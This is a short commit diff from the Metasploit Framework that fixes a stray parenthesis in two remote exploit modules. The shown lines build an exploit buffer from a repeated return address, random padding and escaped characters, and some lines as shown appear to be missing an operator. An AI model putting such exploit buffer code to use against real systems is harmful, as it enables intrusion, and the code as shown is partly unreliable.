git-svn-id: file:///home/svn/framework3/trunk@8189 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-01-21 19:24:54 +00:00
parent ab1a1c58db
commit 9cb3ac9340
2 changed files with 2 additions and 2 deletions

View File

@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
vtbuf = [target.ret].pack('V') * 4
vtbuf << rand_text_alpha(len vtbuf.length))
vtbuf << rand_text_alpha(len vtbuf.length)
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
retstring = Rex::Text.to_unescape(vtbuf)

View File

@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
rand5 = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
vtbuf = [target.ret].pack('V') * 4
vtbuf << rand_text_alpha(len vtbuf.length))
vtbuf << rand_text_alpha(len vtbuf.length)
vtbuf.gsub!(/([dhHjmMsty])/m, '\\\\' + '\1')
retstring = Rex::Text.to_unescape(vtbuf)